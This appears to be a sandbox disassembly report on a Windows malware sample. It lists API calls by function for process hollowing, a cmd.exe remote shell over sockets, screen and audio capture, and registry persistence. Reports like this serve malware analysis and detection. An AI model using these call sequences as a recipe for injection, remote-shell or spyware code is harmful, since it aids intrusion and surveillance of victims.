                                                  • Opcode ID: 6261fb2c15adf737ba8f5a3cc6e343ac48bdd48161021fbf453f9a3f532e97f5
                                                  • Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
                                                  • Opcode Fuzzy Hash: 6261fb2c15adf737ba8f5a3cc6e343ac48bdd48161021fbf453f9a3f532e97f5
                                                  • Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
                                                  Function 0210151C Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 189synchronizationsleepfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 0210153B
                                                  • ExitProcess.KERNEL32 ref: 02101784
                                                    • Part of subcall function 021028C4: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 021028E0
                                                    • Part of subcall function 021028C4: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 021028F9
                                                    • Part of subcall function 021028C4: RegCloseKey.ADVAPI32(?), ref: 02102904
                                                    • Part of subcall function 0210B881: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,020F3D5A,00465324), ref: 0210B89A
                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 021015C2
                                                  • OpenProcess.KERNEL32(00100000,00000000,020FE3BB,?,?,?,?,00000000), ref: 021015D1
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 021015DC
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 021015E3
                                                  • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 021015E9
                                                    • Part of subcall function 02102A3C: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 02102A4A
                                                    • Part of subcall function 02102A3C: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,020FBBB3,004660E0,00000001,000000AF,00465554), ref: 02102A65
                                                    • Part of subcall function 02102A3C: RegCloseKey.ADVAPI32(?,?,?,?,020FBBB3,004660E0,00000001,000000AF,00465554), ref: 02102A70
                                                  • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 0210161A
                                                  • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 02101676
                                                  • GetTempFileNameW.KERNEL32(?,0046B7CC,00000000,?,?,?,?,?,?,?,?,00000000), ref: 02101690
                                                  • lstrcatW.KERNEL32(?,0046B7D8,?,?,?,?,?,?,?,00000000), ref: 021016A2
                                                    • Part of subcall function 0210B7F6: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000000,0210B90C,00000000,00000000,?,?,020FA270), ref: 0210B852
                                                    • Part of subcall function 0210B7F6: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,0210B90C,00000000,00000000,?,?,020FA270), ref: 0210B866
                                                    • Part of subcall function 0210B7F6: CloseHandle.KERNEL32(00000000,?,00000000,0210B90C,00000000,00000000,?,?,020FA270), ref: 0210B873
                                                  • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 0210172B
                                                  • OpenProcess.KERNEL32(00100000,00000000,020FE3BB,?,?,?,?,00000000), ref: 02101740
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 0210174B
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 02101752
                                                  • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 02101758
                                                    • Part of subcall function 0210B7F6: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0210B90C,00000000,00000000,?), ref: 0210B835
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExistsExitMutexNamePointerQuerySleepWritelstrcat
                                                  • String ID: 0DG$@CG$WDH$exepath
                                                  • API String ID: 1212092484-1464086911
                                                  • Opcode ID: eb8ff656f144838187034c17abf61e056b931f5bb5ec87d5f57ca59327fe8020
                                                  • Instruction ID: 71399f53636a955b96195849f11b8ee8d596d9b7dd0cd4c06c5052531c6b3220
                                                  • Opcode Fuzzy Hash: eb8ff656f144838187034c17abf61e056b931f5bb5ec87d5f57ca59327fe8020
                                                  • Instruction Fuzzy Hash: 0451E371A843056FDB10A7A0AC88EFE336EEB04755F1040B5FD05A71D2EFB89E41CA58
                                                  Function 00401BE8 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                  • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                  • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                  • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                  • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                  • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                  • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                  • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                  • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                  • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Write$Create
                                                  • String ID: RIFF$WAVE$data$fmt
                                                  • API String ID: 1602526932-4212202414
                                                  • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                  • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                  • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                  • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                                  Function 004064E0 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\yPIOW6yoPi.exe,00000001,004068B2,C:\Users\user\Desktop\yPIOW6yoPi.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: C:\Users\user\Desktop\yPIOW6yoPi.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                  • API String ID: 1646373207-2461552386
                                                  • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                  • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                  • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                  • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                  Function 02108206 Relevance: 31.8, APIs: 21, Instructions: 324windowmemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateDCA.GDI32(0046BAC8,00000000,00000000,00000000), ref: 02108220
                                                  • CreateCompatibleDC.GDI32(00000000), ref: 0210822B
                                                    • Part of subcall function 021086B9: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 021086E9
                                                  • CreateCompatibleBitmap.GDI32(?,00000000), ref: 021082AC
                                                  • SelectObject.GDI32(00000000,00000000), ref: 021082D2
                                                  • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 021082FA
                                                  • GetCursorInfo.USER32(?), ref: 0210831C
                                                  • GetIconInfo.USER32(?,?), ref: 02108332
                                                  • DeleteObject.GDI32(?), ref: 02108361
                                                  • DeleteObject.GDI32(?), ref: 0210836E
                                                  • DrawIcon.USER32(00000000,?,?,?), ref: 0210837B
                                                  • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00471DE4,00000000,00000000,00660046), ref: 021083AB
                                                  • GetObjectA.GDI32(?,00000018,?), ref: 021083DA
                                                  • LocalAlloc.KERNEL32(00000040,00000028), ref: 02108423
                                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 02108446
                                                  • GlobalAlloc.KERNEL32(00000000,?), ref: 021084AF
                                                  • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 021084D2
                                                  • DeleteObject.GDI32(00000000), ref: 021084EC
                                                  • GlobalFree.KERNEL32(00CC0020), ref: 021084F7
                                                  • DeleteObject.GDI32(00000000), ref: 021085AB
                                                  • GlobalFree.KERNEL32(?), ref: 021085B2
                                                  • DeleteObject.GDI32(?), ref: 02108608
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Object$Delete$AllocCreateGlobal$CompatibleFreeIconInfoLocal$BitmapBitsCursorDisplayDrawEnumSelectSettingsStretch
                                                  • String ID:
                                                  • API String ID: 615876539-0
                                                  • Opcode ID: 86e38cefe18f60a5317b990390b8ef0f53fe4f457a10542f643d98f04a2d82c8
                                                  • Instruction ID: 5c4607475d29a5c6e075c7c82c4f8611bfe12285e7985907a5f7e010b8524765
                                                  • Opcode Fuzzy Hash: 86e38cefe18f60a5317b990390b8ef0f53fe4f457a10542f643d98f04a2d82c8
                                                  • Instruction Fuzzy Hash: 19C17C71148344AFD3209F64DC84B6BBBE9FF88751F05482DF989972A1DB70E904CB66
                                                  Function 021074AC Relevance: 28.3, APIs: 14, Strings: 2, Instructions: 290threadinjectionprocessCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 021075D3
                                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 021075EB
                                                  • GetThreadContext.KERNEL32(?,00000000), ref: 02107601
                                                  • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 02107627
                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 021076A7
                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 021076BB
                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 021076F2
                                                  • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 021077BF
                                                  • SetThreadContext.KERNEL32(?,00000000), ref: 021077DC
                                                  • ResumeThread.KERNEL32(?), ref: 021077E9
                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02107801
                                                  • GetCurrentProcess.KERNEL32(?), ref: 0210780C
                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 02107826
                                                  • GetLastError.KERNEL32 ref: 0210782E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                  • String ID: `#v$ntdll
                                                  • API String ID: 3275803005-3287463391
                                                  • Opcode ID: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                  • Instruction ID: 935999ac1300324be76aff1fd6ade7da2c860f208d99e39b82333f0726da7cf3
                                                  • Opcode Fuzzy Hash: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                  • Instruction Fuzzy Hash: 76A16C71544304AFD7209F65DC88B6BBBE8FF48349F00482AF689C61A1E7B5E445CF69
                                                  Function 0041B1BB Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlenW.KERNEL32(?), ref: 0041B1D6
                                                  • _memcmp.LIBVCRUNTIME ref: 0041B1EE
                                                  • lstrlenW.KERNEL32(?), ref: 0041B207
                                                  • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
                                                  • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
                                                  • lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
                                                  • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
                                                  • _wcslen.LIBCMT ref: 0041B2DB
                                                  • FindVolumeClose.KERNEL32(?), ref: 0041B2FB
                                                  • GetLastError.KERNEL32 ref: 0041B313
                                                  • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
                                                  • lstrcatW.KERNEL32(?,?), ref: 0041B359
                                                  • lstrcpyW.KERNEL32(?,?), ref: 0041B368
                                                  • GetLastError.KERNEL32 ref: 0041B370
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                  • String ID: ?
                                                  • API String ID: 3941738427-1684325040
                                                  • Opcode ID: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                  • Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
                                                  • Opcode Fuzzy Hash: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                  • Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
                                                  Function 0210B422 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlenW.KERNEL32(?), ref: 0210B43D
                                                  • _memcmp.LIBVCRUNTIME ref: 0210B455
                                                  • lstrlenW.KERNEL32(?), ref: 0210B46E
                                                  • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0210B4A9
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0210B4BC
                                                  • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0210B500
                                                  • lstrcmpW.KERNEL32(?,?), ref: 0210B51B
                                                  • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0210B533
                                                  • _wcslen.LIBCMT ref: 0210B542
                                                  • FindVolumeClose.KERNEL32(?), ref: 0210B562
                                                  • GetLastError.KERNEL32 ref: 0210B57A
                                                  • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0210B5A7
                                                  • lstrcatW.KERNEL32(?,?), ref: 0210B5C0
                                                  • lstrcpyW.KERNEL32(?,?), ref: 0210B5CF
                                                  • GetLastError.KERNEL32 ref: 0210B5D7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                  • String ID: ?
                                                  • API String ID: 3941738427-1684325040
                                                  • Opcode ID: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                  • Instruction ID: 8cd8fe1ee96de213e95c0b97d1fea79a96aba6d4380a29f9e106d25c4d35608d
                                                  • Opcode Fuzzy Hash: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                  • Instruction Fuzzy Hash: 6541407154C305ABD720DF64EC88AAF77E8AB48719F00097AF545D21A1EBB4D748CB92
                                                  Function 0213E475 Relevance: 27.4, APIs: 18, Instructions: 419COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$EnvironmentVariable$___from_strstr_to_strchr_wcschr
                                                  • String ID:
                                                  • API String ID: 2719235668-0
                                                  • Opcode ID: 8f41269c20bd7867c5cee3d16b4b1ea97dee87ff38f7f4f352333e12906372dc
                                                  • Instruction ID: d2f13b8399f778681e9a612c8e66c832f4936b1a63310b6f079f495aa7c693e4
                                                  • Opcode Fuzzy Hash: 8f41269c20bd7867c5cee3d16b4b1ea97dee87ff38f7f4f352333e12906372dc
                                                  • Instruction Fuzzy Hash: C0D14B72D80304BFDB27AF789884B6A7BABAF05324F05417DE945A7280E7329941CFD5
                                                  Function 020F52A9 Relevance: 26.5, APIs: 9, Strings: 6, Instructions: 280sleepfileprocessCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 020F52F5
                                                    • Part of subcall function 02123736: RtlEnterCriticalSection.NTDLL(00470D18), ref: 02123740
                                                    • Part of subcall function 02123736: RtlLeaveCriticalSection.NTDLL(00470D18), ref: 02123773
                                                    • Part of subcall function 020F46CF: send.WS2_32(?,00000000,00000000,00000000), ref: 020F4764
                                                  • __Init_thread_footer.LIBCMT ref: 020F5332
                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 020F544E
                                                    • Part of subcall function 02123780: RtlEnterCriticalSection.NTDLL(00470D18), ref: 0212378B
                                                    • Part of subcall function 02123780: RtlLeaveCriticalSection.NTDLL(00470D18), ref: 021237C8
                                                  • Sleep.KERNEL32(0000012C,00000093,?), ref: 020F54A6
                                                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 020F54CB
                                                  • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 020F54F8
                                                    • Part of subcall function 02123B0C: __onexit.LIBCMT ref: 02123B12
                                                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 020F55F5
                                                  • Sleep.KERNEL32(00000064,00000062,00465554), ref: 020F560F
                                                  • TerminateProcess.KERNEL32(00000000), ref: 020F5628
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterFileInit_thread_footerLeaveProcessSleep$CreateNamedPeekPipeReadTerminateWrite__onexitsend
                                                  • String ID: P\G$P\G$P\G$P\G$P\G$cmd.exe
                                                  • API String ID: 121539554-3292008770
                                                  • Opcode ID: 797804256bd83e4a27056d5b7dd8b844625091c3a01af072158c3512f2156987
                                                  • Instruction ID: 329fd7c98cf14d28f9836544d88f7c73a74701cc4bb3ca563d7f980b10aeaf50
                                                  • Opcode Fuzzy Hash: 797804256bd83e4a27056d5b7dd8b844625091c3a01af072158c3512f2156987
                                                  • Instruction Fuzzy Hash: 55910B716807046FD752BB24ED40F6E3B9AEB40344F804039FB19AF5A1EF649C44AF69
                                                  Function 0044E20E Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$EnvironmentVariable$_wcschr
                                                  • String ID:
                                                  • API String ID: 3899193279-0
                                                  • Opcode ID: 8f41269c20bd7867c5cee3d16b4b1ea97dee87ff38f7f4f352333e12906372dc
                                                  • Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
                                                  • Opcode Fuzzy Hash: 8f41269c20bd7867c5cee3d16b4b1ea97dee87ff38f7f4f352333e12906372dc
                                                  • Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D
                                                  Function 00411C81 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 479sleepfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                    • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB5F
                                                    • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                    • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                  • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                  • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                  • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                  • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                  • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                  • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                  • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                  • Sleep.KERNEL32(00000064), ref: 00412060
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                  • String ID: /stext "$HDG$HDG$>G$>G
                                                  • API String ID: 1223786279-3931108886
                                                  • Opcode ID: 95c3da4ebe13c7bf2eea07050c7786c9c599f6c5c587c2468da1972eb038052f
                                                  • Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
                                                  • Opcode Fuzzy Hash: 95c3da4ebe13c7bf2eea07050c7786c9c599f6c5c587c2468da1972eb038052f
                                                  • Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A
                                                  Function 00413E37 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                  • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                  • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                  • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                  • API String ID: 2490988753-744132762
                                                  • Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                  • Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
                                                  • Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                  • Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE
                                                  Function 020FC16B Relevance: 23.0, APIs: 4, Strings: 9, Instructions: 260registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02101900: TerminateProcess.KERNEL32(00000000,?,020FC8E4), ref: 02101910
                                                    • Part of subcall function 02101900: WaitForSingleObject.KERNEL32(000000FF,?,020FC8E4), ref: 02101923
